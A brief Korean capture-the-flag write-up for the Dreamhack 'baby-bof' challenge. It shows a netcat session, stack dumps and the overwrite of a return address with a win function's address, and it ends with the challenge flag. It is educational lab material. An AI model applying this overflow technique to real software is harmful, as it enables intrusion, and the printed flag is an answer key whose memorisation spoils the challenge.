[Dream Hack - Pwnable] baby-bof

Buffer Over Flow

• 프로그램이 특정 크기의 메모리 버퍼를 넘어서 데이터를 쓸 때 발생
• 취약점은 공격자가 악의적인 코드를 실행하거나 시스템의 동작을 변조하는 데 이용가능

 

풀이방법

1.  name을 입력받아서 작성 

| 7ffdc4799ed0 | 7ffdc4799ed8 | 에 입력한 데이터가 stack 안에 저장되고 있는 것을 확인할 수 있다.

 $ nc host3.dreamhack.games 17378
the main function doesn't call win function (0x40125b)!
name: AAAAAAAAA
GM GA GE GV AAAAAAAAA!!
: |  addr		|  value		|
|  7ffdc4799ed0	|  4141414141414141	|
|  7ffdc4799ed8	|             400041	|
|  7ffdc4799ee0	|                 1	 |
|  7ffdc4799ee8	|      7fdb9d4a7d90	|
|  7ffdc4799ef0	|                 0	|
|  7ffdc4799ef8	|            401325	|
|  7ffdc4799f00	|         1c4799fe0	|
|  7ffdc4799f08	|      7ffdc4799ff8	|
|  7ffdc4799f10	|                 0	|
|  7ffdc4799f18	|  301a9f22753ccd72	|
|  7ffdc4799f20	|      7ffdc4799ff8	|
|  7ffdc4799f28	|            401325	|
|  7ffdc4799f30	|            403e18	|
|  7ffdc4799f38	|      7fdb9d6e4040	|
|  7ffdc4799f40	|  cfe117d148decd72	|
|  7ffdc4799f48	|  cfada5b68fb6cd72	|
hex value: 0x40125b

 

 

2.  stack 값을 win 함수 주소 값으로 대체

 

hex value: 0x40125b
integer count: 4
|  addr		|  value		|
|  7fffea7a0fe0	|            40125b	|
|  7fffea7a0fe8	|            40125b	|
|  7fffea7a0ff0	|            40125b	|
|  7fffea7a0ff8	|            40125b	|
|  7fffea7a1000	|                 0	|
|  7fffea7a1008	|            401325	|
|  7fffea7a1010	|         1ea7a10f0	|
|  7fffea7a1018	|      7fffea7a1108	|
|  7fffea7a1020	|                 0	|
|  7fffea7a1028	|  5cb877ac1f1a1be6	|
|  7fffea7a1030	|      7fffea7a1108	|
|  7fffea7a1038	|            401325	|
|  7fffea7a1040	|            403e18	|
|  7fffea7a1048	|      7f467e912040	|
|  7fffea7a1050	|  a347a3583f181be6	|
|  7fffea7a1058	|  a2348b76a5901be6	|

함수가 종료되었을 때 돌아가는 주소 7fffea7a0ff8 를 win 함수 주소로 대체하여 win 함수를 호출할 수 있다.

You mustn't be here! It's a vulnerability!
DH{62228e6f20a8b71372f0eceb51537c7f94b8191651ea0636ed4e48857c5b340c}